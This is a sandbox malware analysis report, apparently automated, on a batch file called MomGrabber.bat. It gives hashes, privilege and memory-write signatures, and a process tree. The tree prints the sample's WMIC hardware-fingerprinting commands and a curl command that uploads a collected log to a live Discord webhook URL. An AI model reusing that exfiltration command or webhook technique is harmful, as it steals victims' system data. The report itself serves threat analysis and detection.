Analysis
- max time kernel: 139s
- max time network: 124s
- platform: windows10-2004_x64
- resource: win10v2004-20240802-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20240802-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 12-08-2024 13:14
Static task: static1
Behavioral task: behavioral1
- Sample: MomGrabber.bat
- Resource: win7-20240729-en
Behavioral task: behavioral2
- Sample: MomGrabber.bat
- Resource: win10v2004-20240802-en
General
- Target: MomGrabber.bat
- Size: 727B
- MD5: 8691d8696a4b87bab23b707f6c9a9fa7
- SHA1: fc34c04ffd8ba2d8e4b4240fb5125bfe9ec8f455
- SHA256: c372a7a932e36fe62d705e40061a72c8f7420188707c9317c88d149181cd4b03
- SHA512: 716ea20bd8f8f32fea0356742ea277ede9136df27fb893bf11551db781d03aa3de2c900b437d50b1081f99592bfbecab4b2a5d849d0a6e1608c7e78a68f028a9
Malware Config
Signatures
- Legitimate hosting services abused for malware hosting/C2 (1 TTPs, 2 IoCs)
  Columns: flow | ioc
  - 4 | discord.com
  - 5 | discord.com
- Delays execution with timeout.exe (1 IoCs)
  Columns: pid | Process
  - 3936 | timeout.exe
- Suspicious use of AdjustPrivilegeToken (64 IoCs)
  Columns: description (Token) | pid | Process. Both processes enable the same sequence of 21 tokens:
  SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36
  - PID 3872 WMIC.exe: the full 21-token sequence, listed twice (42 entries)
  - PID 2504 WMIC.exe: the full 21-token sequence once, followed by SeIncreaseQuotaPrivilege again (22 entries)
- Suspicious use of WriteProcessMemory (10 IoCs)
  Columns: description | pid | Process | procid_target (each pair is listed twice in the report)
  - PID 2380 cmd.exe wrote to memory of 3872 | procid_target 84 (2 entries)
  - PID 2380 cmd.exe wrote to memory of 2504 | procid_target 86 (2 entries)
  - PID 2380 cmd.exe wrote to memory of 2644 | procid_target 87 (2 entries)
  - PID 2380 cmd.exe wrote to memory of 4304 | procid_target 89 (2 entries)
  - PID 2380 cmd.exe wrote to memory of 3936 | procid_target 92 (2 entries)
Processes
- C:\Windows\system32\cmd.exe (depth 1, PID 2380)
  Command line: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\MomGrabber.bat"
  Signatures: Suspicious use of WriteProcessMemory
  - C:\Windows\System32\Wbem\WMIC.exe (depth 2, PID 3872)
    Command line: wmic diskdrive get /format:list
    Signatures: Suspicious use of AdjustPrivilegeToken
  - C:\Windows\System32\Wbem\WMIC.exe (depth 2, PID 2504)
    Command line: wmic baseboard get /format:list
    Signatures: Suspicious use of AdjustPrivilegeToken
  - C:\Windows\System32\Wbem\WMIC.exe (depth 2, PID 2644)
    Command line: wmic bios get /format:list
  - C:\Windows\system32\curl.exe (depth 2, PID 4304)
    Command line: curl -H "Content-Type: multipart/form-data" -F "file=@C:\Users\Admin\AppData\Local\Temp\22186-25730-25642.log" https://discord.com/api/webhooks/1255258727809024114/-QCsZFpQpBHxOspyB3JkzE8_amtIEhu33Ah6-9ogfXbIoIujLtJZrqWKK-2EBRcm_UZs
  - C:\Windows\system32\timeout.exe (depth 2, PID 3936)
    Command line: timeout 1 /nobreak
    Signatures: Delays execution with timeout.exe
Network
MITRE ATT&CK Enterprise v15
Downloads
- Filesize: 276KB
- MD5: 6c0a823a01240be989c2b4eb5d54e0f2
- SHA1: 24253b6a85d05beaa32c45dbbcdb252a95a45e80
- SHA256: 8424ef8abf3c08cd184703ac00359dbd595cc7bb506651b4990f56e4c9e2b9e3
- SHA512: 105b1d57f72b17734bb3dc2a67f0694957ade3192730ef2a3d7c4be8a9a75da7d82c43bf7bb9fca156683efd888fd0dbfca56e8b1bb7e734f89cdca15ea477eb